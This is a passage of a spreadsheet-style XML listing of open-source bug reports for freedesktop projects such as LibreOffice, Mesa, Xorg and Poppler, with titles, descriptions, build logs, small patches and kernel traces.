   (void) memset( server_support 0 sizeof( server_support ) )
------------
// server_support - is now sizeof(unsigned char*) == 4 (on x86)
// insted sizeof (server_support) == 8</t>
  </si>
  <si>
    <t>master_up</t>
  </si>
  <si>
    <t>LIBREOFFICE-77282</t>
  </si>
  <si>
    <t>Edit Group command should be Enter Group like in Draw</t>
  </si>
  <si>
    <t>Problem description:
Two commands doing the same thing are not labeled in the same way in Writer/Calc than in Impress/Draw
Steps to reproduce:
1. Create a new drawing in Draw
2. Create two objects select and group them (Ctrl+Shift+G)
3. Right click on the group
=&gt; Command name is Enter Group if you want to enter (or edit) the group.
4. Copy group
5. Create a new Writer document (or Calc)
6. Paste group
7. Right click on the group
Current behavior:
=&gt; Command is Group &gt; Edit Group
Expected behavior:
Command should have the same name as it is doing the same thing
Help is confusing also as it speaks about Edit Group here:
https://help.libreoffice.org/Impress/Modify#Edit_Group
and Entering group here:
https://help.libreoffice.org/Draw/Grouping_Objects</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-15058</t>
  </si>
  <si>
    <t>correction for Italian - Georgian layout.</t>
  </si>
  <si>
    <t>Created attachment 15182
it's a diff -u it~ it output file.
Some corrections for /usr/share/X11/xkb/symbols/it. - Georgian Section.</t>
  </si>
  <si>
    <t>vsichi</t>
  </si>
  <si>
    <t>TELEPATHY-27124</t>
  </si>
  <si>
    <t>Missing docs for some classes</t>
  </si>
  <si>
    <t>The generated documentation is missing docs for some classes even if the classes are documented.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-14286</t>
  </si>
  <si>
    <t>Patch for Turkish keyboard layouts</t>
  </si>
  <si>
    <t>Created attachment 14004
keymap.patch
This patch adds some missing symbols which are present on windows. This also fixes the decimal separator issue (In Turkish it is comma). Finally it includes a fix for AltGr+Space. It causes problems for people who type fast :)</t>
  </si>
  <si>
    <t>XORG-3082</t>
  </si>
  <si>
    <t>Locks up every time</t>
  </si>
  <si>
    <t>The xserver freezes on Radeon X600 PCI-E AMD Athlon64 almost immediately.
Disabling acceleration helps.</t>
  </si>
  <si>
    <t>sliwa</t>
  </si>
  <si>
    <t>PLYMOUTH-41196</t>
  </si>
  <si>
    <t>[PATCH] Documentation spelling fix</t>
  </si>
  <si>
    <t>Created attachment 51602
Documentation spelling fix</t>
  </si>
  <si>
    <t>DRI-72864</t>
  </si>
  <si>
    <t>[BYT]igt/kms_cursor_crc fails with eDP</t>
  </si>
  <si>
    <t>Created attachment 90970
dmesg
System Environment:
--------------------------
Platform: BYT/BDW
kernel:   (drm-intel-nightly)02905525c3310ba673676f8041d0ff6be4da0e24
Bug detailed description:
---------------------------
It fails on BYT and BDW with eDP If connect VGA It works well.
I can't find out a good commit.
run ./kms_cursor_crc --run-subtest cursor-black-invisible-offscreen
output:
IGT-Version: 1.5-g2a71bff (x86_64) (Linux: 3.13.0-rc4_drm-intel-nightly_074fdf_20131219+ x86_64)
Beginning cursor-black-invisible-offscreen on crtc 3 connector 20
.Test assertion failure function do_single_test file kms_cursor_crc.c:147:
Last errno: 0 Success
Failed assertion: igt_crc_equal(&amp;crcs[0] &amp;test_data-&gt;ref_crc)
Subtest cursor-black-invisible-offscreen: FAIL
Reproduce steps:
-------------------------
1. ./kms_cursor_crc --run-subtest cursor-black-invisible-offscreen</t>
  </si>
  <si>
    <t>POPPLER-29189</t>
  </si>
  <si>
    <t>Fails to parse PDF with damaged internal structure</t>
  </si>
  <si>
    <t>Created attachment 37264
patch
Hello
I using poppler version 0.12.4. Recently I investigated a malicious PDF file (this is the reason why I can't supply a sample). One of the problems I encountered was failure to open a PDF by poppler. The PDF file contained a static (old style) xref table. At PDFDoc::setup (poppler/PDFDoc.cc file) function we have:
 xref = new XRef(str)
 ...
 catalog = new Catalog(xref)
At XRef constructor we have two flows:
1). Read static xref table
2). If something failed at 1) run dynamic build of XRef. (more expensive procedure)
If the XRef was build OK by flow #1 (statically read from xref) the code will continue to create the Catalog. At Catalog constructor we have two failure flows:
1). If Catalog dictionary was not fetched properly
2). If Pages dictionary was not fetched properly (this is the reason why my file failed to open)
Both could happen after the XRef was constructed which could be problematic.
For example: xref table was build staticaly. If objects in PDF file are not enumerated properly and Pages dictionary is expected at object 3 (3 0) but object 2 (2 0) is missing (condition obj1.getInt() == num at poppler/XRef.cc XRef::fetch(...) function will fail).
For this reason I added a fallback functionality patch.
According to the patch we only once will try to reconstruct XRef dynamically iff Catalog construction fails and XRef was constructed statically.</t>
  </si>
  <si>
    <t>SPICE-49092</t>
  </si>
  <si>
    <t>unix agent</t>
  </si>
  <si>
    <t>Use XDG dirs instead of $HOME</t>
  </si>
  <si>
    <t>Current we use ~/.spice-vdagent. It would be better to follow the XDG base directory standard. http://standards.freedesktop.org/basedir-spec/latest/index.html
There are glib convenience functions for this http://developer.gnome.org/glib/2.32/glib-Miscellaneous-Utility-Functions.html#g-get-user-data-dir etc.</t>
  </si>
  <si>
    <t>POPPLER-21361</t>
  </si>
  <si>
    <t>Remove deprecated Glib symbols</t>
  </si>
  <si>
    <t>According to http://www.gnome.org/~fpeters/299.html
poppler 0.10.2 uses one deprecated Glib symbol: g_basename
See http://live.gnome.org/GnomeGoals/RemoveDeprecatedSymbols/Glib .
$:andre\&gt; cd poppler-0.10.2/
$:andre\&gt; grep -r g_basename .
./test/gtk-cairo-test.cc:      fprintf (stderr usage: %s PDF-FILES...\n g_basename (argv[0]))</t>
  </si>
  <si>
    <t>DRI-21417</t>
  </si>
  <si>
    <t>[G33][KMS] Out of range signal when changing to lower resolution</t>
  </si>
  <si>
    <t>Ubuntu Jaunty with xserver-xorg-video-intel 2.6.3 recompiled with KMS support.
Linux 2.6.30-rc3. 
Intel DG33TL motherboard x86_64.
Dell 2007WFP monitor connected through DVI with 1680x1050 native resolution.
If I change the resolution to a lower setting (1024x768 640x480 etc) then the screen goes blank and the monitor reports Out of range signal. If I boot with i915.modeset=0 then this does work.
dmesg reports:
[  139.742393] [drm] TMDS-8: set mode 640x480 16
[  145.563191] [drm] TMDS-8: set mode 1680x1050 17
Booting into the native resolution works fine and gives a very cool/big console. xrandr does report:
sean@triffid:~$ xrandr -q
xrandr: output DVI1 cannot use rotation normal reflection none
Please ask if there is anything I can try or do to assist in debugging this.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-5480</t>
  </si>
  <si>
    <t>Include Bengali National Layout of Bangladesh in bd</t>
  </si>
  <si>
    <t>Currently bd contains in(ben) - it is basically Inscript layout which is
widely used in India.
Bangladesh computer council [http://www.bcc.net.bd/] has already declared the
National layout. I will submit a patch soon.</t>
  </si>
  <si>
    <t>jamil</t>
  </si>
  <si>
    <t>LIBREOFFICE-67684</t>
  </si>
  <si>
    <t>Saving to ODS loses text formatting.</t>
  </si>
  <si>
    <t>Created attachment 83553
Test document
1. Open the attached document.
2. Save it right away.
3. Reload the file.
4. The formatting of texts in Column B is gone.</t>
  </si>
  <si>
    <t>MESA-56405</t>
  </si>
  <si>
    <t>Distorted graphics on Radeon HD 6620G</t>
  </si>
  <si>
    <t>Created attachment 69083
Distorted graphics
On my dell vostro laptop I get distorted graphics. I use Gnome3 shell.
See attached screen shot.
The kernel used is 3.6.3-1-ARCH.   
I found the problem is apparent with the versions 9.0-1 of ati-dri and
libgl and is not seen when I downgrade to the versions:
ati-dri-8.0.4-3-x86_64.pkg.tar.xz
libgl-8.0.4-3-x86_64.pkg.tar.xz</t>
  </si>
  <si>
    <t>mdrslmr</t>
  </si>
  <si>
    <t>MESA-30195</t>
  </si>
  <si>
    <t>drmRadeonCmdBuffer: -22. Kernel failed to parse or rejected command streamS</t>
  </si>
  <si>
    <t>Since today's (9/15) upgrade of git mesa trying to run glxgears or any of the demos mesa shows the following error:
---
drmRadeonCmdBuffer: -22. Kernel failed to parse or rejected command stream. See dmesg for more info.
---
There is no info about mesa in dmesg.
I am running linux kernel 2.6.35-4 amd64 Mesa DRI R600 (RS780 9612) 20090101  TCL DRI2 2.1 Mesa 7.9-devel X.Org X Server 1.9.0 (git version)</t>
  </si>
  <si>
    <t>LIBREOFFICE-62267</t>
  </si>
  <si>
    <t>Conditional formatting lost after paste special of text numbers and dates.</t>
  </si>
  <si>
    <t>If you have a cell with conditional formatting and you use paste special only inserting only text numbers and dates the formatting is lost. Undo do not recover the conditional formatting.
What happening:
The conditional formatting lost.
Expected:
Conditional formatting should be untouched. Also an undo should bring back the conditional formatting.
To me it looks like two bad things are happening at the same time: Loosing the conditional formatting and second that it cannot be undone. So that's the reason I have assigned severity major
Version 4.0.2.0+ (Build ID: 3f04ec08b75d4ecb44ec3ec1230d2072d975c63)
TinderBox: Linux-x86_64@31-Release-Configuration-RHEL5-Baseline Branch:libreoffice-4-0 Time: 2013-03-11_17:41:05</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-19573</t>
  </si>
  <si>
    <t>Request to create new vaapi mailing list</t>
  </si>
  <si>
    <t>Hi
This is a request to create a new mailing list to discuss VA API (http://www.freedesktop.org/wiki/Software/vaapi) related development with the list name as vaapi and initial owner being jonathan.bian@intel.com.
Thanks
Jonathan Bian</t>
  </si>
  <si>
    <t>jonathan.bian</t>
  </si>
  <si>
    <t>MESA-42993</t>
  </si>
  <si>
    <t>Intel Linux Graphics 3D tracker bug for Mesa 8.x</t>
  </si>
  <si>
    <t>This is a tracker bug for issues that should be fixed for the 2012.01 (or 12.01) Intel Linux Graphics stack release.
This tracker is for MESA-related issues.</t>
  </si>
  <si>
    <t>LIBREOFFICE-32719</t>
  </si>
  <si>
    <t>[EasyHack] Clean up some impress templates</t>
  </si>
  <si>
    <t>Created attachment 41503
Impress template out of border
When using default templates with impress RC2 many of them have ugly edit zones.
Zones for text image diagram are out of border.
I can redesign them but it's not friendly.
The template affected in the rc02 version are :
fresco
keyboard
light blue shapes
noise paper
red noise shapes
rounded rectangles
tunnel
water
white blue and lightnings
wine</t>
  </si>
  <si>
    <t>mr.magicvince</t>
  </si>
  <si>
    <t>XORG-10225</t>
  </si>
  <si>
    <t>(Kind of) uninitialized variable results in Xv bug on C&amp;T 69030</t>
  </si>
  <si>
    <t>Line 641 of ct_video.c (see link) the tmp variable seems to be used somehow strangely.
This resulted in only top half of Xv video showing up when it used scaling stretched to fill the area. At 1:1 size the video worked ok (as drw_h &gt; src_h condition is false).
I rewrote the part based on the specs for 69030 (http://asiliant.com/pdf/ds182_3.pdf  search for MR33). The following code works for me but I don't know about other chips cards.
I also haven't tested double scan modes (I don't know how they work). Spec says that the zoom factor is 0x100 / MR31 thus 0x100 / (0x100 * source / dest) = dest / source. Also added &amp; 0x7C per the spec to keep MSB and bottom 2 bits clear doesn't work otherwise.
Patch follows:
--- xf86-video-chips-1.1.1.orig/src/ct_video.c  2006-04-08 02:29:31.000000000 +0300
+++ xf86-video-chips-1.1.1/src/ct_video.c       2007-03-08 21:56:26.000000000 +0200
@@ -6388 +6388 @@
        if (dblscan)
            tmp = cPtr-&gt;VideoZoomMax &gt;&gt; 1
        if (drw_h &gt; src_h)
-           tmp = tmp * src_h / drw_h
-       cPtr-&gt;writeMR(cPtr 0x33 tmp)
+           tmp = 256 * src_h / drw_h
+       cPtr-&gt;writeMR(cPtr 0x33 tmp 
     }
     cPtr-&gt;writeMR(cPtr 0x1F m1f)
     cPtr-&gt;writeMR(cPtr 0x1E m1e)</t>
  </si>
  <si>
    <t>jpa</t>
  </si>
  <si>
    <t>XORG-2562</t>
  </si>
  <si>
    <t>imake tries running files in /tmp/</t>
  </si>
  <si>
    <t>imake tries running file in /tmp/ this will not work with systems that mount
/tmp/ noexec
The entire compile:
make[1]: Entering directory `/usr/src/xc'
Building Release 6.8.2.
I hope you checked the configuration parameters in ./config/cf
to see if you need to pass BOOTSTRAPCFLAGS.
Thu Feb 17 16:58:49 EST 2005
cd ./config/imake &amp;&amp; /usr/bin/make -w -f Makefile.ini BOOTSTRAPCFLAGS= CC=cc
 clean
make[2]: Entering directory `/usr/src/xc/config/imake'
rm -f ccimake imake.o imake
rm -f *.CKP *.ln *.BAK *.bak *.o core errs * *~ *.a tags TAGS make.log \#*
rm -f -r Makefile.proto Makefile Makefile.dep bootstrap
rm -f imakemdep_cpp.h
make[2]: Leaving directory `/usr/src/xc/config/imake'
/usr/bin/make -w Makefile.boot
make[2]: Entering directory `/usr/src/xc'
cd ./config/imake &amp;&amp; /usr/bin/make -w -f Makefile.ini BOOTSTRAPCFLAGS= CC=cc
make[3]: Entering directory `/usr/src/xc/config/imake'
making imake with BOOTSTRAPCFLAGS= and CROSSCOMPILEFLAGS=-DCROSSCOMPILEDIR= in
 config/imake
cc -o ccimake -DCROSSCOMPILEDIR=\\  -O -I../../include -I../../imports/x11/inc
lude/X11 ccimake.c
if [ -n  ]  then \
/cc -E `./ccimake` \
-DCROSSCOMPILE_CPP imakemdep.h &gt; imakemdep_cpp.h \
else touch imakemdep_cpp.h fi
cc -c  -O -I../../include -I../../imports/x11/include/X11 `./ccimake` imake.c
cc -o imake  -O -I../../include -I../../imports/x11/include/X11 imake.o
make[3]: Leaving directory `/usr/src/xc/config/imake'
rm -f ./config/makedepend/Makefile.proto
./config/imake/imake -I./config/cf  -s ./config/makedepend/Makefile.proto -f ./c
onfig/makedepend/Imakefile -DTOPDIR=../.. -DCURDIR=./config/makedepend
sh: /tmp/imake8v4KbF: Permission denied
make[2]: Leaving directory `/usr/src/xc'
make[2]: *** [config/makedepend/Makefile.proto] Aborted
make[2]: *** Deleting file `config/makedepend/Makefile.proto'
make[1]: *** [World] Error 2
make[1]: Leaving directory `/usr/src/xc'
the sh: /tmp/imake8v4KbF: Permission denied seems particularly indicative of
the problem.</t>
  </si>
  <si>
    <t>gderber</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-11837</t>
  </si>
  <si>
    <t>JavaScript detected as C source</t>
  </si>
  <si>
    <t>[ Forwarded from http://bugs.debian.org/397945 ]
Similar to bug 9407 this JavaScript source starts with comments and is matched as  C source
http://asurvey.net/ccsfagent/media/survey.js</t>
  </si>
  <si>
    <t>MESA-103393</t>
  </si>
  <si>
    <t>glDispatchComputeGroupSizeARB : gl_GlobalInvocationID.x != gl_WorkGroupID.x * gl_LocalGroupSizeARB.x + gl_LocalInvocationID.x</t>
  </si>
  <si>
    <t>Created attachment 134977
Difference between the result of  gl_GlobalInvocationID and gl_WorkGroupID.x * gl_LocalGroupSizeARB.x + gl_LocalInvocationID.x
The spec for ARB_compute_variable_group_size in this file https://www.khronos.org/registry/OpenGL/extensions/ARB/ARB_compute_variable_group_size.txt state that gl_GlobalInvocationID = gl_WorkGroupID * gl_LocalGroupSizeARB + gl_LocalInvocationID but on my computer arch linux with  Radeon RX 580 Series (AMD POLARIS10 / DRM 3.18.0 / 4.13.
7-1-ARCH LLVM 5.0.0) : mesa version 17.2.2  gl_GlobalInvocationID = gl_LocalInvocationID  only. If I replace uint i = gl_GlobalInvocation.x with  uint i = gl_WorkGroupID.x * gl_LocalGroupSizeARB.x + gl_LocalInvocationID.x  the output of the compute shader work as expected.</t>
  </si>
  <si>
    <t>stephane.chevigny</t>
  </si>
  <si>
    <t>DRI-49476</t>
  </si>
  <si>
    <t>CRV/MBY-Linux: HDMI Audio not detected in all linux OS (32/64 bit)</t>
  </si>
  <si>
    <t>HDMI Audio is not detected in all Linux destros
Updated IntelÂ® 12.02 graphics package able to get the display during hotplug and colg plug but HDMI audio is not detected in the system.  
-----------------------------------------------------------------------------
Configuration Used :
--------------------
Board       		:   LL2
Bios Ver     		:   V82
ME Sku      		:   QM77 5MB    
Silicon      		:   IVB(4+2)E2GT 2(1350 MHz) 
PCH          		:   PPT C1
Memory       		:   1GB Hynix 1333 MHz
OS       	 	: Fedora 32/64
Kernel  	 	: 3.2.8-030208-generic-pae
Xorg-x11-drv-driver 	: 2.17.0-10.fc16
Mesa-dri-drivers	: 8.0.1-9.fc16.
Libdrm    		: 2.4.33.1.fc16
Chipset   		: i915
Board     :RH2
Bios Ver  :V88
ME Sku    :HM76 1.5MB
Silicon   :IVB E0 2+2 
PCH       :PPT C1
Memory       		:   1GB Hynix 1333 MHz
OS       	 	: Fedora 32/64
Kernel  	 	: 3.2.8-030208-generic-pae
Xorg-x11-drv-driver 	: 2.17.0-10.fc16
Mesa-dri-drivers	: 8.0.1-9.fc16.
Libdrm    		: 2.4.33.1.fc16
Chipset   		: i915
Board       :   EH2
Bios Ver    :   V88
ME Sku      :   HM77 1.5MB    
Silicon     :   IVB(2+2)E2 
PCH         :   PPT C1
Memory      :   1GB
OS       	 	: Fedora 32/64
Kernel  	 	: 3.2.8-030208-generic-pae
Xorg-x11-drv-driver 	: 2.17.0-10.fc16
Mesa-dri-drivers	: 8.0.1-9.fc16.
Libdrm    		: 2.4.33.1.fc16
Chipset   		: i915
+++++ eselvarx 5/2/2012 11:41:50 PM
HDMI Audio not detected in all linux OS (fedora 16Suse 12.1 Ubuntu 11.10)
Note:
1.HDMI audio not detected in Suse OS
2.HDMI audio not detected in Ubuntu OS
 (Unable to change the sound settings in ubuntu)
3.HDMI not detected in all chiefriver boards
4.For further reference refer the following documents
   a.For Suse 64 bit
  https://vthsd.fm.intel.com/hsd/pdosw/download/default.aspx?id=3559038&amp;focus=presighting&amp;name=Suse_64bitPVchfrvr.zip
  b.For Fedora 64 bit
  https://vthsd.fm.intel.com/hsd/pdosw/download/default.aspx?id=3559020&amp;focus=presighting&amp;name=Attachments_2012_03_21.zip
  c.For Ubuntu 32/64 bit refer the attached document
.....................................................................
Configuration Used : Fedora 16
Board       		:   LL2
Bios Ver     		:   V82
ME Sku      		:   QM77 5MB    
Silicon      		:   IVB(4+2)E2GT 2(1350 MHz) 
PCH          		:   PPT C1
Memory       		:   1GB Hynix 1333 MHz
OS       	        : Fedora 32/64
Kernel  	        : 3.2.8-030208-generic-pae
Xorg-x11-drv-driver 	: 2.17.0-10.fc16
Mesa-dri-drivers	: 8.0.1-9.fc16.
Libdrm    		: 2.4.33.1.fc16
Chipset   		: i915
.....................................................................
Configuration used: Suse 12.1
Board        :   LL2
Bios Ver     :   V87
ME Sku       :   HM67 1.5MB(ME ver: 8.0.10.1464)  
Silicon      :   IVB(4+2)E2GT 2(1150 MHz) 
PCH          :   CPT B4
Memory       :   1GB Hynix 1333 MHZ
OS           :   Suse 12.1 64 Bit chief river PV OS
Kernel       : 3.2.9.-2-desktop
xorg         : 7.6
Mesa         : 8.0.1
libva        : 1.0.15
libdrm       : 2.4.31
OpenGl String: 2.1
Xserver      : 1.10.4
.....................................................................
Configuration used: Ubuntu 11.10
Board   EL2
CPU	IVB E2 (2+2)
PPT	C1  (HM77)
Bios	HM77  1.5MB (V82)
OS	Ubuntu 11.10 64 bit Chief river PV
Kernel             Kernel-image-3.2.8-030208-generic-pae
Libdrm             2.4.31
Libva              1.0.15
Xorg               2.17.0
.....................................................................
Monitor Used:
*********************************************************************
HDMI monitor  -  Sony Bravia
Model Number  -  KLV-32CX420
Serial Number -  7000015
*********************************************************************
1) install any linux flavor (Fedora Ubuntu SUSE) 
2) Update above mentioned kernel and graphis drivers
3) Cold plug or hot plug the HDMI TV HDMI TV is detected in the OS and able to get the display but HDMI audio is not detected in the system and Unable to configure with sound settings also.</t>
  </si>
  <si>
    <t>sudhindra.raju</t>
  </si>
  <si>
    <t>XORG-215</t>
  </si>
  <si>
    <t>libXt build broken by --prefix=/usr</t>
  </si>
  <si>
    <t>make[2]: Entering directory `/usr/src/crashbox/BUILD/libXt-0.1.4'
if /bin/sh ./libtool --mode=compile gcc -DHAVE_CONFIG_H -I. -I. -I.    
-DXTHREADS -DXUSE_MTSAFE_API   -Wall -Wpointer-arith -Wstrict-prototypes
-Wmissing-prototypes -Wmissing-declarations -Wnested-externs
-fno-strict-aliasing -DXTHREADS -DXUSE_MTSAFE_API   -I./include/X11 -O2 -MT
ActionHook.lo -MD -MP -MF .deps/ActionHook.Tpo -c -o ActionHook.lo ActionHook.c \
then mv -f .deps/ActionHook.Tpo .deps/ActionHook.Plo else rm -f
.deps/ActionHook.Tpo exit 1 fi
 gcc -DHAVE_CONFIG_H -I. -I. -I. -DXTHREADS -DXUSE_MTSAFE_API -Wall
-Wpointer-arith -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations
-Wnested-externs -fno-strict-aliasing -DXTHREADS -DXUSE_MTSAFE_API
-I./include/X11 -O2 -MT ActionHook.lo -MD -MP -MF .deps/ActionHook.Tpo -c
ActionHook.c  -fPIC -DPIC -o .libs/ActionHook.o
In file included from IntrinsicI.h:54
                 from ActionHook.c:69:
Xtos.h:58:25: X11/Xalloca.h: No such file or directory
In file included from IntrinsicI.h:55
                 from ActionHook.c:69:
include/X11/IntrinsicP.h:54:27: X11/Intrinsic.h: No such file or directory
In file included from IntrinsicI.h:55
                 from ActionHook.c:69:</t>
  </si>
  <si>
    <t>SYSTEMD-29912</t>
  </si>
  <si>
    <t>systemd/systemctl should provide a --version option to help with bug reporting</t>
  </si>
  <si>
    <t>Unless I missed it there's no way to make them display their version.
I guess either 'systemctl version' or 'systemctl --version' should report the version.</t>
  </si>
  <si>
    <t>LIBREOFFICE-46635</t>
  </si>
  <si>
    <t>FILESAVE Endless loop during autorecovery if format not writable</t>
  </si>
  <si>
    <t>If the document being edited has a format in which Writer cannot save the autosave attempt will cause an endles loop.</t>
  </si>
  <si>
    <t>XORG-8763</t>
  </si>
  <si>
    <t>xkbcomp can not handle xkb_geometry with negative coordinates in shapes</t>
  </si>
  <si>
    <t>I've originally opened a bug report against xfree86 where I observed it but I
think that the same issue is present in x.org:
http://bugs.xfree86.org/show_bug.cgi?id=1675
Specification The X Keyboard Extension: LibrarySpecification Library Version
1.0 / Document Revision 1.1 X Consortium Standard X Version 11 Release 6.4
explicitely allows negative coordinates of vertices in shape definitions. All
the code in xkbcomp X libraries and X server can handle such coordinates but
xkbcomp parser can not handle minus signs in coordinates. Many geometry files
have to specify negative gap between buttons to work around this limitations.
I will attach a patch with a trivial fix. Maybe the patch should be enhanced to
allow for explicit '+' signs.</t>
  </si>
  <si>
    <t>avg</t>
  </si>
  <si>
    <t>DRI-110225</t>
  </si>
  <si>
    <t>DRM/amdkfd</t>
  </si>
  <si>
    <t>Kernel panic while â€œ  modprobe amdkfd   modprobe -r amdkfd    4.14.35 kernel .</t>
  </si>
  <si>
    <t>Hello 
I am investigating a issue that our test group reported concerning this driver.  Their test loads and unloads every kernel module included in the Oracle 4.14.35 kernel release . You donâ€™t even need a AMD platform . It occurs on any Intel  or a  KVM VM instance too. 
Kernel panic while â€œ  modprobe amdkfd   modprobe -r amdkfd  â€œ
[  329.425334]  ? __slab_free+0x9b/0x2ba
[  329.427836]  ? process_slab+0x3c1/0x45c
[  329.430336]  dev_printk_emit+0x4e/0x65
[  329.432829]  __dev_printk+0x46/0x8b
[  329.435183]  _dev_info+0x6c/0x85
[  329.437435]  ? kfree+0x141/0x182
[  329.439646]  kfd_module_exit+0x37/0x39 [amdkfd]
[  329.442258]  SyS_delete_module+0x1c3/0x26f
[  329.444722]  ? entry_SYSCALL_64_after_hwframe+0xaa/0x0
[  329.447479]  ? entry_SYSCALL_64_after_hwframe+0xa3/0x0
[  329.450206]  ? entry_SYSCALL_64_after_hwframe+0x9c/0x0
[  329.452912]  ? entry_SYSCALL_64_after_hwframe+0x95/0x0
[  329.455586]  do_syscall_64+0x79/0x1ae
[  329.457766]  entry_SYSCALL_64_after_hwframe+0x151/0x0
[  329.460369] RIP: 0033:0x7f1757a1b457
[  329.462502] RSP: 002b:00007ffd62ce1f48 EFLAGS: 00000206 ORIG_RAX:
Looks like some memory corruption. 
Sometimes  the unload works but the message logged is garbage:
[root@jpd-vmbase02 ~]# modprobe -r amdkfd
[  144.449981] ???????????? hn??èŸŸ??xn??×Ÿ??kfd: Removed module
Is  this something one of team members could have possibly corrected in an upstream version ?
#define KFD_DRIVER_DESC         Standalone HSA driver for AMD's GPUs
#define KFD_DRIVER_DATE         20150421
#define KFD_DRIVER_MAJOR        0
#define KFD_DRIVER_MINOR        7
#define KFD_DRIVER_PATCHLEVEL   2
Thank you
John</t>
  </si>
  <si>
    <t>John.p.donnelly</t>
  </si>
  <si>
    <t>DBUS-30618</t>
  </si>
  <si>
    <t>Replace defunct update-dbus-docs.sh with makefile rules</t>
  </si>
  <si>
    <t>update-dbus-docs.sh supposedly uploaded the various bits of documentation to the web but hasn't worked for ages. I integrated building and uploading the documentation with the build system so now one should be able to run:
  % make maintainer-upload-docs
to push the latest version of the specification API documentation etc. to dbus.freedesktop.org. It worked for me when I tried it a few weeks ago. :)</t>
  </si>
  <si>
    <t>XORG-10562</t>
  </si>
  <si>
    <t>Compiling Font.c leads to a glibc #warning</t>
  </si>
  <si>
    <t>In file included from Font.c:44:
/usr/include/sys/ipc.h:25:3: warning: #warning Files using this header must be compiled with _SVID_SOURCE or _XOPEN_SOURCE
Scary.</t>
  </si>
  <si>
    <t>SPECIFICATIONS-20187</t>
  </si>
  <si>
    <t>menu-spec Categories: mapping navigation GPS...</t>
  </si>
  <si>
    <t>There are no Categories usable for mapping (viewers editors GIS) navigation and GPS utility software (visualisation logger utilities).
Nearest fits for Map viewers editors and GIS (pretty far):
Graphics2DGraphics
Graphics2DGraphicsRasterGraphics
Graphics2DGraphicsVectorGraphics
EducationGeography
EducationScienceGeoscience
Engineering
For GPS utilties (again pretty far):
SettingsHardwareSettings
Due to lack of proper classification several software vendors started to use unofficial:
GraphicsMaps
Spec should cleanly say which category should be used for this type of software.
Possible solutions:
a) keep everything as is document mapping software Categories: Geoscience or Geography (ugly)
b) Introduce new category: Mapping Maps or Navigation with allowed secondary categories Graphics Utility Education Science (and maybe Research see bug 20186)
b1) New category should be recommended for GIS as well.
b2) GIS can be documented as Geography or Geoscience
b3) GIS should be a new secondary category.
b4) GIS chould be related to Engineering
References:
bug 20186
http://sourceforge.net/tracker/?func=detail&amp;atid=570956&amp;aid=2116042&amp;group_id=83870
http://lists.freedesktop.org/archives/xdg/2008-September/009969.html</t>
  </si>
  <si>
    <t>PORTLAND-23319</t>
  </si>
  <si>
    <t>xdg-open can't handle arguments with # symbol</t>
  </si>
  <si>
    <t>xdg-utils 1.0.2 FreeBSD 8.0-BETA i386.
# xdg-open http://www.freebsd.org/doc/en_US.ISO8859-1/books/faq/applications.html#PORTS-MAJOR-UPGRADE
sed: 1: s#%s#http://www.freebsd ...: bad flag in substitute command: 'P'
xdg-open:367:
browser_with_arg=`echo $browser | sed s#%s#$1#`
obviously $1 should be escaped or (likely better) printf should be used instead of echo.</t>
  </si>
  <si>
    <t>amdmi3</t>
  </si>
  <si>
    <t>DRI-71375</t>
  </si>
  <si>
    <t>[Bisected]igt/gem_ctx_bad_exec/blt fails</t>
  </si>
  <si>
    <t>Created attachment 88875
dmesg
System Environment:
--------------------------
Platform: Pineview/GM45/Ironlake/Sandybridge/Ivybridge/Haswell/Baytrail
Kernel: (drm-intel-nightly)2f29640dfa2e434361a834fb40c89eedd66cb235
Bug detailed description:
-------------------------
It fails on all platforms with -fixes -nightly and -queued kernel.
Following  cases also have this issue:
igt/gem_ctx_bad_exec/bsd
igt/gem_ctx_bad_exec/vebox
Bisect shows:4a6a59f314f61e1e4156bb13a65efabee31a76fc is the first bad commit.
commit 4a6a59f314f61e1e4156bb13a65efabee31a76fc
Author:     Daniel Vetter 
AuthorDate: Tue Nov 5 11:56:50 2013 +0100
Commit:     Daniel Vetter 
CommitDate: Tue Nov 5 13:42:47 2013 +0100
    tests/gem_ctx_bad_exec: Check the errno too
    Signed-off-by: Daniel Vetter 
output:
Test assertion failure function __real_main88 file gem_ctx_bad_exec.c:106:
Failed assertion: exec(fd handle I915_EXEC_BLT ctx_id) != 0 &amp;&amp; errno == ENOENT
Subtest blt: FAIL
Reproduce steps:
-------------------------
1. ./gem_ctx_bad_exec --run-subtest blt</t>
  </si>
  <si>
    <t>XORG-48642</t>
  </si>
  <si>
    <t>App/xauth</t>
  </si>
  <si>
    <t>Fix crash on removing non-existant entry</t>
  </si>
  <si>
    <t>Created attachment 59903
Fix crash on removing non-existant entry
This is patch by Dirk Mueller  we have in openSUSE.
See summary :-)</t>
  </si>
  <si>
    <t>PORTLAND-60329</t>
  </si>
  <si>
    <t>'xdg-mime query default' return multiple .desktop entries.</t>
  </si>
  <si>
    <t>I'm not using DE and I have 2 records for text/plain 
grep text/plain /usr/share//applications/defaults.list
text/plain=gedit.desktop
grep text/plain /usr/share//applications/mimeinfo.cache 
text/plain=kde4-kate.desktop
xdg-mime from trunk return 2 .desktop entries.
./xdg-mime query default text/plain
gedit.desktop kde4-kate.desktop</t>
  </si>
  <si>
    <t>sokoloff.a</t>
  </si>
  <si>
    <t>TELEPATHY-28787</t>
  </si>
  <si>
    <t>ObserveChannels takes way too long</t>
  </si>
  <si>
    <t>On my machine calling ObserveChannels on the logger literally takes 4 seconds (i've got a bustle log showing it) while waiting for the return of ObserveChannels there is loads and loads of disk activity. Strace seems to indicate that there is something going on with the SqlLite log.
In any case ObserveChannels should be nearly instantanious as it's on the critical patch from requesting a channel to the channel being given to the handler. And as empathy only shows the chat window when it gets HandleChannels it now takes 4 seconds for me between clicking a contact and the window popping up.. bad</t>
  </si>
  <si>
    <t>DRI-107128</t>
  </si>
  <si>
    <t>[CI] SKL-IOMMU igt@drv_selftest@live_coherency failed with error -5</t>
  </si>
  <si>
    <t>CI hosts are starting to run i915 selftests and this bug is part of the series Initial findings
On SKL with IOMMU not disabled selftest igt@drv_selftest@live_coherency fails with message
[  387.755935] i915 0000:00:02.0: GPU recovery failed
[  387.798444] Failed to set value[0/1] in object using gpu err=-5
[  387.798468] i915/i915_gem_coherency_live_selftests: igt_gem_coherency failed with error -5
[  387.900210] i915: probe of 0000:00:02.0 failed with error -5
Full trace at
